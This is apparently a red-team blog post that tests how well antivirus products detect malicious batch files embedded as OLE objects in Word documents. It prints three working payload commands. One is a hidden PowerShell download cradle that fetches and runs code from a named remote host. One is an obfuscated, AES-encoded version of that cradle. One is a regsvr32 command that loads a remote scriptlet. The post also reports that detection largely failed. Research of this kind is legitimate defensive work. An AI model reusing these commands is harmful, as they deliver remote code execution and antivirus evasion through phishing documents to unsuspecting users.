Computer viruses have been around since as early as the 1970’s - the eternal battle between virus creators and antivirus solutions continues to wage over 40 years later.

The majority of penetration testers and red teamers will have experienced a situation where they’ve needed to bypass an antivirus solution to execute malicious code (either pre or post exploitation). Frameworks such as Veil make hundereds of different techniques accessible at the push of a button.

Social engineering is a common element during engagements - especially of the Red Team variety. Whether you’re doing phishing or a USB drop, delivering malicious Office documents is a very popular way of getting malicious code execution. This is due, in no small way, to Office having native tools that can be leveraged, such as macro’s, OLE and PowerPoint Custom Actions. Many businesses use macro’s legitimately to do clever things in Excel docs; OLE to distribute other files within documents and so on. This means that seeing macro’s and embedded objects is not out of place, it’s BAU. The challenge for users, AV vendors and Blue Teams, is differentiating the benige from the hostile and striking that balance between not blocking enough and blocking too much.

Anybody following John Lambert will know that malicious OLE’s are on the map right now and there are some great examples of rather complex and sophisticated payloads. But do they have to be…? Well obviously that depends on the maturity of your target, but I was interested to find out just what the state of play is with AV vs OLE.

To the laboratory.

This is the mock Word doc. In all cases, the OLE is a simple batch file, called unlock.bat that contains my malicious code. All it requires is the user to run the file.

Test 1

The first test contains the most basic PowerShell download cradle to grab and run a staged http beacon.

powershell.exe -nop -w hidden -c "iex ((new-object net.webclient).downloadstring('http://kobaruto.duckdns.org/a'))"

This resulted in only 1 hit on VT. Congrats ClamAV…

Test 2

The second test uses the same download cradle as above, but run through Invoke-Obfuscation with the AES Encoding and CMD + PowerShell Launcher options.

CMd   /C POwERSHeLl -WINDowSTY HIddEn -NonInTEr -NoprOFi   ". ( $vERboSeprEFERenCE.tosTRINg()[1,3]+'x'-JOiN'') (([rUntImE.inTEROpsERvICES.marsHaL]::pTRtOsTRinGUNi([ruNTImE.inTEropsERvICES.maRshaL]::SECUReSTRINGTOgLoBalAlLoCUNIcoDe( $('76492d1116743f0423413b16050a5345MgB8ADQAbgB5AFkAegBvAG0AdwBkAEMAaQBIAHMAVABkAEkAQwBCAC8AegBDAGcAPQA9AHwANgBjADQAMAA4ADgAYwA2ADAAYQAyAGUANgA5AGIAOQBiADQAOQA1ADQAZABjADEAMwBkAGMAMgBjAGIANAA4ADYANABmADcAZgBiADEANABjADUAYwBkADUAYwBjAGEAZAAzADgAOQBmADAAYQBjADUAYwA3ADAAMwA3ADUAMgA5ADIANgA3ADMAMABkADIAZgAxADEANABkAGEAZgBjADAAMQA1ADQAMgBjADEANQAwADMAYQAzAGYAZAA3ADQAOABhAGEAOAA4ADkAYwAwAGUAYwAyAGEAZQBiADQAYwAzADcANAA5ADMAZgAxADQAZAA4ADkAZgAxAGQAMAAxADAAOAA3AGIAOQBiADQAOQA3ADgANQBmAGQAZgAxADcAYQBjADEAMgBhADkAZAAzADEAMQA0AGUANQA0ADMANgA5AGEAMgA2ADYANQAwAGMANwBmADgAMwAyADYANAAwAGIAYwA0AGQAOABlADgANAA2ADUAZgAwAGMAYgA2AGQAOAAwADgAOABjAGIAYQAxADIANwBkADMAYwA0ADgANQA2ADAAMAA0AGIANwA4AGMAZABiADIAOABkADQAYQA0AGEAOAA5ADcAMgBhAGQAYgA5ADkAMQBiAGIAOQBhADIAMwBiAGUAOQA2AGIANABmADQANwA1ADUAOQA3AGUAZgAzADEANAA4AGQANAA4AGEAYwA2ADcAMQAwADgAOQAzAGQAYgA4AGYAMwA1ADQAOAA4ADQAMQBjAGIAZQBhADMAYwAzAGEAMABkADQAMgA0AGYAZgBmADIAOAA2ADAAZAA4AGIAYQBkADkAYwBhAGEANwBkADEAMwBmAGIAYQAzADgAMgBlAGQAYgBkADMANgBmADcAYQAxAGQAYgA1ADYANwA1ADcANABmADAAZAAzADUAMgA0ADEANQA1ADYAMwA='|CoNveRTto-seCurEStRING -KE (11..34)))) ) )"

0 hits.

Test 3

The third used some of the application whitelisting bypass work by Casey Smith.

regsvr32 /s /u /n /i:https://gist.githubusercontent.com/rasta-mouse/b93a7eafacee04837fb59b53ca27025c/raw/203c8b0740313a91147d7c33e3e4a278b4863d73/http.sct scrobj.dll

0 hits.

At this point, I kinda gave up - the whole thing is clearly broken… I didn’t expect the AV to fair particularly well, but it surprised me just how little AV seems to detect in OLE. Of course on a real engagement there are other considerations apart from AV, this was just a simple experiment.

The other mad thing is, I received a beacon from one of the VT sandboxes and it still didn’t flag it as malicious…